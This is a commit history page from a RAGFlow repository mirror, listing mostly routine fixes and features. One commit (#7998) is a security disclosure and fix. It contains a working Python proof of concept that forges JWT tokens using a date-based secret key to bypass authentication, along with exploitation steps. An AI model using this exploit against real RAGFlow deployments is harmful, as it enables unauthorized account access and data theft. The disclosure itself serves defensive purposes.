ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2026-01-24 03:56:37 +08:00

Author	SHA1	Message	Date
Liu An	d11cfd4e45	Fix: Add input validation to chunk creation endpoint (#8516 ) ### What problem does this PR solve? - Include optional `tag_feas` field if present in request - Add input validation for `important_kwd` and `question_kwd` to ensure they are lists - #8462 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:00 +08:00
Yongteng Lei	0eb90e73a5	Feat: add MCP dashboard functionalities list_tools and test_tool (#8505 ) ### What problem does this PR solve? Add MCP dashboard functionalities list_tools and test_tool. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-26 13:52:01 +08:00
Liu An	dac5bcdf17	Fix: Enforce default embedding model in create_dataset / update_dataset (#8486 ) ### What problem does this PR solve? Previous: - Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI' - Did not respect user-configured default embedding_model Now: - Correctly prioritizes user-configured default embedding_model Other: - Make embedding_model optional in CreateDatasetReq with proper None handling - Add default embedding model fallback in dataset update when empty - Enhance validation utils to handle None values and string normalization - Update SDK default embedding model to None to match API changes - Adjust related test cases to reflect new validation rules ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-25 16:41:32 +08:00
Stephen Hu	8d9d2cc0a9	Fix: some cases Task return but not set progress (#8469 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8466 I go through the codes, current logic: When do_handle_task raises an exception, handle_task will set the progress, but for some cases do_handle_task internal will just return but not set the right progress, at this cases the redis stream will been acked but the task is running. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-25 09:58:55 +08:00
Yongteng Lei	af6850c8d8	Feat: add MCP dashboard operations (#8460 ) ### What problem does this PR solve? Add MCP server dashboard operations. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-25 09:26:04 +08:00
Stephen Hu	382d2d0373	Refactor:Improve insert file logic (#8445 ) ### What problem does this PR solve? before refactor 1. create file record 2. Add to blob if have some execption at 2 the system db will have a file record but not have related blob, which will introduce some bug. after refactor 1. add to blob 2. create file record. if 1 success but 2 failed just have a dirty blob in blob system, user will not feel that ### Type of change - [x] Refactoring	2025-06-24 13:17:22 +08:00
Song Fuchang	fd7ac17605	Feat: Scratch MCP tool calling support. (#8263 ) ### What problem does this PR solve? This is a cherry-pick from #7781 as requested. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 17:45:35 +08:00
Stephen Hu	794a4102c2	Fix: Document parse via API will alot problen (#8407 ) ### What problem does this PR solve? #8391 #8404 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 13:08:11 +08:00
Yongteng Lei	936a91c5fe	Fix: code debug may corrupt by history answer (#8385 ) ### What problem does this PR solve? Fix code debug may corrupt by history answer. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-20 14:23:02 +08:00
Liu An	9077ee8d15	Fix: desc parameter parsing (#8362 ) ### What problem does this PR solve? - Correct boolean parsing for 'desc' parameter in document_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 14:22:56 +08:00
RyanFernandes23	c8b1790c92	Fix typo in dataset name length error message (#8351 ) ### What problem does this PR solve? Fixes a minor grammar issue in a user-facing error message. The original message said "large than" instead of the correct comparative form "larger than". Just a quick fix I noticed while reading the code. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 09:54:30 +08:00
Yongteng Lei	1b022116d5	Feat: wrap search app (#8320 ) ### What problem does this PR solve? Wrap search app ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-18 16:45:42 +08:00
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Liu An	64e281b398	Fix: Add validation for empty filenames in document_app.py (#8321 ) ### What problem does this PR solve? - Add validation for empty filenames in document_app.py and trim whitespace ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-17 15:53:41 +08:00
Liu An	a3bebeb599	Fix: Enforce 255-byte filename limit (#8290 ) ### What problem does this PR solve? - Add filename length validation (<=255 bytes) for document upload/rename in both HTTP and SDK APIs - Update error messages for consistency - Fix comparison operator in SDK from '>=' to '>' for filename length check ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-16 16:39:41 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Liu An	99725444f1	Fix: desc parameter parsing (#8229 ) ### What problem does this PR solve? - Fix boolean parsing for 'desc' parameter in kb_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:47 +08:00
Stephen Hu	1ab0f52832	Fix：The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Kevin Hu	d36c8d18b1	Refa: make exception more clear. (#8224 ) ### What problem does this PR solve? #8156 ### Type of change - [x] Refactoring	2025-06-12 17:53:59 +08:00
Liu An	7fbbc9650d	Fix: Move pagerank field from create to update dataset API (#8217 ) ### What problem does this PR solve? - Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq - Add pagerank update logic in dataset update endpoint - Update API documentation to reflect changes - Modify related test cases and SDK references #8208 This change makes pagerank a mutable property that can only be set after dataset creation, and only when using elasticsearch as the doc engine. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:49 +08:00
Liu An	d0c5ff04a6	Fix: Add pagerank validation for non-elasticsearch doc engines (#8215 ) ### What problem does this PR solve? Validate that pagerank updates are only allowed when using elasticsearch as the document engine. Return an error if pagerank is set while using a different doc engine, preventing potential inconsistencies in document scoring. #8208 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:22 +08:00
Liu An	cef587abc2	Fix: Add validation for dataset name in KB update API (#8194 ) ### What problem does this PR solve? Validate dataset name in knowledge base update endpoint to ensure: - Name is a non-empty string - Name length doesn't exceed DATASET_NAME_LIMIT - Whitespace is trimmed before processing Prevents invalid dataset names from being saved and provides clear error messages. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 11:37:25 +08:00
Liu An	60c1bf5a19	Fix: duplicate knowledgebase name validation logic (#8199 ) ### What problem does this PR solve? Change the condition from checking for >1 to >=1 when validating duplicate knowledgebase names to properly catch all duplicates. This ensures no two knowledgebases can have the same name for a tenant. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 09:46:57 +08:00
Liu An	e87ad8126c	Fix: Improve dataset name validation in KB app (#8188 ) ### What problem does this PR solve? - Trim whitespace before checking for empty dataset names - Change length check from >= to > DATASET_NAME_LIMIT for consistency ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-11 16:14:29 +08:00
Stephen Hu	e6f68e1ccf	Fix: When List Kbs some times the total is wrong (#8151 ) ### What problem does this PR solve? for kb.app list method when owner_ids the total calculate is wrong (now will base on the paged result to calculate total) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 11:34:30 +08:00
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 ) ### What problem does this PR solve? Issue: #8051 The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation. Root Cause Analysis - The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints - Some identity providers (like certain Keycloak configurations) use custom endpoints - Our previous approach constructed JWKS URLs by convention rather than discovery ### Solution Approach Instead of constructing JWKS URLs by appending to the issuer URI, we now: 1. Properly leverage the `jwks_uri` from the OIDC discovery metadata 2. Honor the identity provider's actual configured endpoint ```python # Before (fragile approach) jwks_url = f"{self.issuer}/.well-known/jwks.json" # After (standards-compliant) jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Liu An	92625e1ca9	Fix: document typo in test (#8091 ) ### What problem does this PR solve? fix document typo in test ### Type of change - [x] Typo	2025-06-05 19:03:46 +08:00
Stephen Hu	6953ae89c4	Fix:when stream=false，new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in a assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
CharlesHsu	241fdf266a	Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966 ) Fix: Prevent Flask hot reload from hanging due to early thread startup ### What problem does this PR solve? When running the Flask server with `use_reloader=True` (enabled during debug mode), modifying a Python source file would trigger a reload detection (`Detected change in ...`), but the application would hang instead of restarting cleanly. This was caused by the `update_progress` background thread being started too early, often within the main module scope. This issue was reported in [#7498](https://github.com/infiniflow/ragflow/issues/7498). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --- Summary of changes: - Wrapped `update_progress` launch in a `threading.Timer` with delay to avoid premature thread execution. - Marked thread as `daemon=True` to avoid blocking process exit. - Added `WERKZEUG_RUN_MAIN` environment check to ensure background threads only run in the reloader child process (the actual Flask app). - Retained original behavior in production mode (`debug=False`). --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-30 13:38:30 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00
dong	62de535ac8	Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968 ) ### What problem does this PR solve? When performing the dify_retrieval, the metadata of the document was empty. ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:58:05 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The internal is due to when the selected row keys change will trigger a testing, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
天海蒼灆	f584f5c3d0	agents openai API add new way to get session_id (#7937 ) ### What problem does this PR solve? SpringAI can only add session_id in metadata。so add new way to get session_id from "id" or "metadata.id" ![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 13:31:17 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
Yongteng Lei	b95747be4c	Fix: early return when update doc in sdk (#7907 ) ### What problem does this PR solve? Fix early return when update doc. #7886 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-28 19:20:27 +08:00

1 2 3 4 5 ...

881 Commits